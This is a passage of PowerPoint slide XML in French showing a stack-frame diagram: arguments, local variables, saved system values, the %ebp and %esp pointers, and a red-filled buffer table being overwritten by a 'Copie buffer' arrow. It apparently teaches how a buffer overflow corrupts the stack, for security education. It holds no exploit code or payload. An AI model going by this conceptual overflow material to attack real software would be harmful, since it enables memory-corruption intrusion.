                        <a:t>[7]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[6]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[5]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[4]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="445753">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[3]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[2]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[0]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Groupe 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9927976" y="2167734"/>
            <a:ext cx="1245636" cy="746449"/>
            <a:chOff x="10422293" y="1726164"/>
            <a:chExt cx="1245636" cy="746449"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Accolade fermante 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10422293" y="1726164"/>
              <a:ext cx="158621" cy="746449"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 82291"/>
                <a:gd name="adj2" fmla="val 487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52" name="ZoneTexte 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10501603" y="1960888"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Les arguments</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="Groupe 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9931322" y="3753860"/>
            <a:ext cx="1166326" cy="2012267"/>
            <a:chOff x="10482942" y="3687729"/>
            <a:chExt cx="1166326" cy="746449"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Accolade fermante 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10492272" y="3687729"/>
              <a:ext cx="158621" cy="746449"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 82291"/>
                <a:gd name="adj2" fmla="val 487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55" name="ZoneTexte 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10482942" y="3781308"/>
              <a:ext cx="1166326" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Les variables locales</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Groupe 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9946957" y="3380569"/>
            <a:ext cx="2371759" cy="646331"/>
            <a:chOff x="7504217" y="3917743"/>
            <a:chExt cx="1836413" cy="667793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="Connecteur droit avec flèche 55"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7504217" y="4257865"/>
              <a:ext cx="949738" cy="5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ZoneTexte 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8336527" y="3917743"/>
              <a:ext cx="1004103" cy="667793"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Pointeur de la frame courante</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9927976" y="5664411"/>
            <a:ext cx="2349609" cy="276999"/>
            <a:chOff x="7586479" y="4825845"/>
            <a:chExt cx="1327013" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="60" name="Connecteur droit avec flèche 59"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="61" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7586479" y="4964345"/>
              <a:ext cx="79947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ZoneTexte 60"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8385950" y="4825845"/>
              <a:ext cx="527542" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Groupe 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9832044" y="6149093"/>
            <a:ext cx="1265604" cy="415498"/>
            <a:chOff x="6657818" y="5983323"/>
            <a:chExt cx="1265604" cy="415498"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="ZoneTexte 62"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6757096" y="5983323"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>0x000…00</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="ZoneTexte 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6657818" y="6121822"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Adresse basse</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65" name="Groupe 64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9840778" y="1689006"/>
            <a:ext cx="1265604" cy="425047"/>
            <a:chOff x="6652228" y="601320"/>
            <a:chExt cx="1265604" cy="425047"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="ZoneTexte 65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6652228" y="601320"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Adresse haute</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="ZoneTexte 66"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6751506" y="749368"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>0xFFF…FF</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635444" y="5142592"/>
            <a:ext cx="1357744" cy="2102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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Connecteur en angle 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1993189" y="3161378"/>
            <a:ext cx="5990899" cy="2086336"/>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85" name="Groupe 84"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9337772" y="3196774"/>
            <a:ext cx="330442" cy="2665916"/>
            <a:chOff x="9337772" y="3196774"/>
            <a:chExt cx="330442" cy="2665916"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="68" name="Connecteur droit avec flèche 67"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9668214" y="3196774"/>
              <a:ext cx="0" cy="262314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9" name="ZoneTexte 68"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8893109" y="5141027"/>
              <a:ext cx="1166326" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Copie buffer</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="ZoneTexte 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9840777" y="5585155"/>
            <a:ext cx="659963" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="73" name="Groupe 72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9927976" y="2959333"/>
            <a:ext cx="1245636" cy="746449"/>
            <a:chOff x="10422293" y="1726164"/>
            <a:chExt cx="1245636" cy="746449"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Accolade fermante 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10422293" y="1726164"/>
              <a:ext cx="158621" cy="746449"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 82291"/>
                <a:gd name="adj2" fmla="val 487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5" name="ZoneTexte 74"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10501603" y="1960888"/>
              <a:ext cx="1166326" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Variables systèmes</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="76" name="Tableau 75"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1746705235"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5811442" y="2117293"/>
          <a:ext cx="2001416" cy="3695748"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
              </a:tblGrid>
              <a:tr h="407542">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="407542">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="482592">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>h</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>t</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>r</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>e</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>g</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>o</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
